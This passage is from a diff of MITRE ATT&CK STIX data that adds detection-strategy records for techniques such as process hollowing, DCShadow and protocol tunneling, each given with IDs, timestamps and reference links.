+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--786c54fa-8a9f-41bc-aa22-c4a4f6a93bd7",
+                        "x-mitre-analytic--6ed3efbf-c060-4c7f-8d8b-0e93f65a0790",
+                        "x-mitre-analytic--8fba0b53-2aca-4cca-8856-714e0f05665b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--40701244-5af5-477f-a9a7-ba661907f318",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0417",
+                            "external_id": "DET0417"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Power Settings Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3234a537-0ad5-449f-87f4-25fd949c97e7",
+                        "x-mitre-analytic--e3bbe2c4-615d-4847-93dc-b5857fc1b384",
+                        "x-mitre-analytic--101d4e7f-4282-4fea-89be-e17d97ca0b91"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f31ad178-1f54-41a6-b286-8040e7eb7158",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0451",
+                            "external_id": "DET0451"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for PowerShell Profile Persistence via profile.ps1 Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--298d1a46-ec12-4cd2-acce-7e0f849c384d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--276ac500-e134-4852-96cd-8aa899ad0c7c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0045",
+                            "external_id": "DET0045"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Process Argument Spoofing on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--84ad99e5-4e6e-4d07-93ae-9e55e6f99707"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8373cca7-feb8-44e4-94d0-fc39ea3586d7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0544",
+                            "external_id": "DET0544"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Process Doppelg\u00e4nging on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--37d6450b-6c90-48dd-b69d-161099913851"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8e003575-5a6f-458d-be35-a8606c9b7dea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0382",
+                            "external_id": "DET0382"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Process Hollowing on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bcb01d01-66f6-47bb-9ca1-46b4ce686ad4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fff8e15e-f7eb-4c07-8b77-8e7ef2eb01b6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0538",
+                            "external_id": "DET0538"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Protocol Tunneling accross OS platforms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--64c6aa46-a824-4c8e-8462-d0a58b78acfb",
+                        "x-mitre-analytic--5acd81f3-466a-472d-bb1f-9bda231ac4c0",
+                        "x-mitre-analytic--359ab8ab-f306-4e67-8ff4-f8e1c8ec7db3",
+                        "x-mitre-analytic--7f128f2c-5b38-4088-9026-e251237f8add"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c2768ab6-522f-4b88-b3f7-a30230208ceb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0203",
+                            "external_id": "DET0203"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Ptrace-Based Process Injection on Linux",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d9bcfaee-d2d1-4673-b834-5c219f8dba9b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--20f5a44b-e9bb-48e9-9bea-e7a3d757005f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0408",
+                            "external_id": "DET0408"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Reflection Amplification DoS (T1498.002)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fdf11d76-3bd7-41c4-b117-7b0f17b31b17",
+                        "x-mitre-analytic--eb7692b0-5592-4d23-ba06-fdded48a2a0d",
+                        "x-mitre-analytic--44c2e32e-bd34-4ba9-8105-28c14309207c",
+                        "x-mitre-analytic--08c69003-044c-46a5-b17a-7cb5b25f2d50"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dc415caf-2f8f-4208-8aa8-7db10729cbfb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0300",
+                            "external_id": "DET0300"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Reflective Code Loading",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2432f5a3-ddae-4138-9981-f916ad23a1e1",
+                        "x-mitre-analytic--cfdd2422-7e68-417a-9298-062bac59df0c",
+                        "x-mitre-analytic--da7cf744-fc04-4b17-8a96-3140a4b349d6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9ec6dafe-3e93-4ebb-943e-26b84136f6a9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0574",
+                            "external_id": "DET0574"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Remote System Enumeration Behavior",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--498eb889-4468-4c55-9337-df219d5f142b",
+                        "x-mitre-analytic--f794d2f4-ad8e-4e11-b374-2c35f8ca38e9",
+                        "x-mitre-analytic--80c7f835-116d-4fa1-817a-08965efef16c",
+                        "x-mitre-analytic--88041144-900d-4968-9e8a-8f1f63ae8417",
+                        "x-mitre-analytic--aad71d3e-93b0-4cb6-8240-274369f8ad34"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0f320fd9-cf15-4fd6-bcb3-c3a52760fe88",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0584",
+                            "external_id": "DET0584"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Resource Forking on macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--619804e7-5ae7-4c6e-b1bb-e1d10a22cc87"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9c36b7a8-22bb-4420-a8ac-8e46ddef5674",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0156",
+                            "external_id": "DET0156"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Resource Hijacking: SMS Pumping via SaaS Application Logs",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5beb62fd-7dac-485f-828c-72cf151124a8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f012e122-9f78-4370-a481-d2efaa181359",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0276",
+                            "external_id": "DET0276"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Rogue Domain Controller (DCShadow) Registration and Replication Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--34fecfa5-24fb-46c1-955f-68ecd4cc402c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--264a9ce0-b26f-4cc6-bdf4-384b0d188a95",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0277",
+                            "external_id": "DET0277"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Role Addition to Cloud Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--04412d94-62ac-4484-9408-c4ca1c206f1b",
+                        "x-mitre-analytic--a52321d0-5961-497b-8212-61602e05420b",
+                        "x-mitre-analytic--8601dbfa-8767-4328-8809-1930b53b5e31"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--41107d12-dd2e-439f-af29-1a10dcfcb6ce",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0391",
+                            "external_id": "DET0391"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Runtime Data Manipulation.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c07e8730-b5cf-4a74-be3a-938184af42df",
+                        "x-mitre-analytic--e2e39b7e-02e4-4e7a-966c-6b05721da8f7",
+                        "x-mitre-analytic--a9c30b9d-6810-47d3-8bf5-ca787836e7ef"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2dc6a789-2dd7-4d64-be82-73db6fc3fb70",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0453",
+                            "external_id": "DET0453"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for SNMP (MIB Dump) on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--282d9231-942a-4b97-875c-659aa2c41971"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--101bde37-6150-45c6-bf88-3a8cda39b2f0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0181",
+                            "external_id": "DET0181"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for SQL Stored Procedures Abuse via T1505.001",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f9fb1a46-02f0-4d89-a3d9-6bed04bd47be",
+                        "x-mitre-analytic--2e039fd4-a1f6-4c4b-b47a-56c257335298"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
